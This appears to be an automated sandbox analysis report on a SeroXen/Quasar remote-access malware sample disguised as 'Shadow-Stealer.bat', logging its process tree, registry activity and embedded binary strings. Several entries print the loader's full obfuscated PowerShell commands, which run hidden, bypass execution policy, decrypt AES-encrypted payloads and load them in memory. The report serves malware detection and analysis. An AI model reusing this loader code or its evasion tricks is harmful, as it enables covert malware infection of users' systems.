            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%Jump to behavior
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,8_2_0000000140001014
            Source: C:\Windows\SysWOW64\dllhost.exeCode function: 9_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_0040133E
            Source: C:\Windows\System32\dllhost.exeCode function: 20_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,20_2_0000000140001B30
            Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_00401B33 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,23_2_00401B33
            Source: C:\Windows\$sxr-powershell.exeWMI Queries: IWbemServices::ExecNotificationQuery - root\cimv2 : select * from Win32_ProcessStartTrace
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlgsfutp.pce.ps1Jump to behavior
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,8_2_0000000140001014
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF71380FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,13_2_00007FF71380FB54
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\$sxr-powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
            Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2244:120:WilError_03
            Source: C:\Windows\$sxr-powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\cf16a257-7d89-4296-8384-8fca3dbb568f
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
            Source: C:\Windows\$sxr-mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Shadow-Stealer.batStatic file information: File size 13144733 > 1048576
            Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yApVCRtJPjQJu.exe, 0000002A.00000002.3355364200.000000000083E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: costura.costura.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: powershell.pdbUGP source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: powershell.pdb source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr

            Data Obfuscation

            barindex
            Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exeUnpacked PE file: 42.2.yApVCRtJPjQJu.exe.2930000.6.unpack
            Source: Yara matchFile source: 15.2.$sxr-powershell.exe.1facccc4e50.31.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
            Source: 15.2.$sxr-powershell.exe.1facd0fdc88.20.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
            Source: 15.2.$sxr-powershell.exe.1facd0fdc88.20.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
            Source: C:\Windows\$sxr-powershell.exeAnti Malware Scan Interface: Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.Ciphe
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 